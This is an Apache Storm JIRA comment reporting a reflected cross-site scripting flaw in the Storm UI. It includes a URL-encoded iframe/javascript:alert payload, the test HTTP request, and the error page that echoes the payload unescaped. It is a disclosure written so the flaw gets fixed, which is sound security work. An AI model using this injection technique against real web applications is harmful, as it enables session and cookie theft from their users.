[
https://issues.apache.org/jira/browse/STORM-408?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14065533#comment-14065533
]
Anand Krishnan commented on STORM-408:
--------------------------------------
These Cross-site Scripting security vulnerabilities are manifest in the Storm
UI specifically. They were discovered using a commercial security tool that
injects various attack vectors into the HTTP request and analyzes the response.
For example, changing the following HTTP GET request URL: (*NOTE: actual server
name was changed to {server_name} )
{{ http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332 }}
by changing the end of parameter: {{ 1402681332 }}
to: {{ 1402681332%3Ciframe%20src=javascript:alert(1342)%20 }}
{{
http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20
}}
_Test HTTP Request and Response:_
{code}
GET
/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64;
Trident/6.0)
Connection: Keep-Alive
DNT: 1
Host: {server_name}:8080
Cookie: sys=true
{code}
{code}
HTTP/1.1 500 Internal Server Error
Date: Wed, 18 Jun 2014 19:37:01 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3183
Server: Jetty(6.1.26)
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd";>
<html><head><title>Storm UI</title><link
href="/css/bootstrap-1.1.0.css" rel="stylesheet"
type="text/css"><link href="/css/style.css" rel="stylesheet"
type="text/css"><script
src="/js/jquery-1.6.2.min.js" type="text/javascript"></script><script
src="/js/jquery.tablesorter.min.js"
type="text/javascript"></script><script
src="/js/jquery.cookies.2.2.0.min.js"
type="text/javascript"></script><script src="/js/script.js"
type="text/javascript"></script></head><body><h1><a href="/">Storm
UI</a></h1><h2>Internal Server
Error</h2><pre>NotAliveException(msg:PROCESS_STATUS_TOPOLOGY-3-1402681332<iframe
src=javascript:alert(1342) )
at
backtype.storm.generated.Nimbus$getTopologyInfo_result.read(Nimbus.java:11330)
at org.apache.thrift7.TServiceClient.receiveBase(TServiceClient.java:78)
at
backtype.storm.generated.Nimbus$Client.recv_getTopologyInfo(Nimbus.java:474)
at
backtype.storm.generated.Nimbus$Client.getTopologyInfo(Nimbus.java:461)
at backtype.storm.ui.core$topology_page.invoke(core.clj:481)
at backtype.storm.ui.core$fn__7877.invoke(core.clj:745)
at compojure.core$make_route$fn__3855.invoke(core.clj:93)
at compojure.core$if_route$fn__3843.invoke(core.clj:39)
at compojure.core$if_method$fn__3836.invoke(core.clj:24)
at compojure.core$routing$fn__3861.invoke(core.clj:106)
at clojure.core$some.invoke(core.clj:2390)
at compojure.core$routing.doInvoke(core.clj:106)
at clojure.lang.RestFn.applyTo(RestFn.java:139)
at clojure.core$apply.invoke(core.clj:603)
at compojure.core$routes$fn__3865.invoke(core.clj:111)
at ring.middleware.reload$wrap_reload$fn__7170.invoke(reload.clj:14)
at backtype.storm.ui.core$catch_errors$fn__7912.invoke(core.clj:798)
at
ring.middleware.keyword_params$wrap_keyword_params$fn__4391.invoke(keyword_params.clj:27)
at
ring.middleware.nested_params$wrap_nested_params$fn__4428.invoke(nested_params.clj:65)
at ring.middleware.params$wrap_params$fn__4365.invoke(params.clj:55)
at
ring.middleware.multipart_params$wrap_multipart_params$fn__4454.invoke(multipart_params.clj:103)
at ring.middleware.flash$wrap_flash$fn__4729.invoke(flash.clj:14)
at ring.middleware.session$wrap_session$fn__4720.invoke(session.clj:43)
at ring.middleware.cookies$wrap_cookies$fn__4657.invoke(cookies.clj:160)
at ring.adapter.jetty$proxy_handler$fn__4204.invoke(jetty.clj:16)
at
ring.adapter.jetty.proxy$org.mortbay.jetty.handler.AbstractHandler$0.handle(Unknown
Source)
at
org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at
org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at
org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:928)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:549)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at
org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
at
org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
</pre></body></html>
{code}
The test result seems to indicate a vulnerability because commercial security
tool successfully embedded
a script in the response, which will be executed when the page loads in the
user's browser.
Let me know if this is the type of detail you were interested in.
> Cross-Site Scripting security vulnerability
> -------------------------------------------
>
> Key: STORM-408
> URL: https://issues.apache.org/jira/browse/STORM-408
> Project: Apache Storm (Incubating)
> Issue Type: Bug
> Affects Versions: 0.9.3-incubating
> Environment: Java
> Reporter: Anand Krishnan
> Labels: security
> Fix For: 0.9.3-incubating, feature-security
>
>
> There are Cross-Site Scripting security vulnerabilities in Apache Storm.
> The risk is that it is possible to steal or manipulate customer session and
> cookies, which might be used to impersonate a legitimate user, allowing the
> hacker to view or alter user records, and to perform transactions as that
> user.
> The reason is that sanitation of hazardous characters was not performed
> correctly on user input.
--
This message was sent by Atlassian JIRA
(v6.2#6252)
